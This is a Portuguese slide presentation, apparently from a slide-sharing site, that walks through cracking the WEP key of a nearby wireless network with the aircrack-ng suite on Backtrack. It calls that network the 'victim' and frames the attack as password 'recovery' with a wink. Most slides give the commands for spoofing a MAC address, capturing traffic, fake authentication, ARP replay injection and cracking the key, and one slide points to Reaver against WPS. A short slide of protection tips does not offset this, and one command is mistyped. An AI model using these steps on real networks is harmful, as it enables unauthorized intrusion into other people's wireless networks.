Como recuperar senhas WEP de redes wireless com Backtrack

911 visualizações

Publicada em

Tutorial sobre como recuperar senhas wep e dicas de como se proteger de ataques para ingresso não autorizado em redes wireles

Publicada em: Tecnologia
  • Seja o primeiro a comentar

Como recuperar senhas WEP de redes wireless com Backtrack

  1. 1. Como recuperar senha WEP de redes wireless com Backtrack Sim. Recuperar.
  2. 2. Do que você vai precisar? • Um adaptador wireless compatível • Um CD/DVD com Backtrack • Uma rede WEP próxima • Paciência com os comandos (MUITA)
  3. 3. Quanto tempo leva? • Depende do hardware e da conexão • 5 – 20 min (não calculando o tempo que se leva digitando comandos)
  4. 4. Funciona com redes WPA? • Este método não funciona • Use Reaver, também no Backtrack • Se você tiver sorte leva 2,5h • Documentação oficial sugere de 4 a 10 horas • Depende do hardware e da conexão também • Depende do tamanho da chave de criptografia, pois é força-bruta • O Access Point/Hot spot deve ter WPS (Wi-Fi Protected Setup)
  5. 5. Como se proteger? • Não use WEP, apenas WPA • Se houver WPS, desabilite-o • Não compre router com WPS
  6. 6. Passo 1 – Identificar interface • Abra o console > airmon-ng • Resultado = (interface) utilizada para o ataque (ex. ra0, wlan0)
  7. 7. Passo 2 – Falsificar o MAC > airmon-ng stop (interface) // prepara parada da interface > ifconfig (interface) down // desativa o dispositivo de rede > macchanger --mac 00:11:22:33:44:55 (interface) // muda o MAC > airmon-ng start (interface) // reativa interface • Se tudo ocorreu bem, você falsificou seu MAC!
  8. 8. Passo 3 – Identificar a vítima > airodump-ng (interface) • Mostrará uma lista de todas as redes no alcance • Copie o Nome da rede (name), BSSID e CH (channel)
  9. 9. Passo 4 – Sniffar tudo > airodump-np –c (channel) –w (name) --bssid (bssid) (interface) • Isso vai pegar todos os pacotes e colocar tudo em um arquivo chamado (name)
  10. 10. Passo 5 – Entrar na rede • Abra um novo console (deixe o outro aberto sniffando) > aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (name) (interface) • No final deve aparecer “Association Successful : )” • Entramos na rede! Mas não acabou...
  11. 11. Passo 6 – Entrar na rede • Precisamos sniffar uma quantidade maior de pacotes para o programa conseguir a senha da rede definitivamente > aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) • Criamos uma rota de tráfego para a captura ser mais rápida • Observe a coluna #Data incrementar mais rápido, precisamos que passe de 10.000 pacotes!
  12. 12. Passo 7 – Hora da verdade • Abre um terceiro console > aircrack-ng -b (bssid) (name-01.cap) • Se não houver pacotes suficientes vai abortar • Se estiver tudo certo vai aparecer “KEY FOUND” seguido da senha WEP da rede em questão

×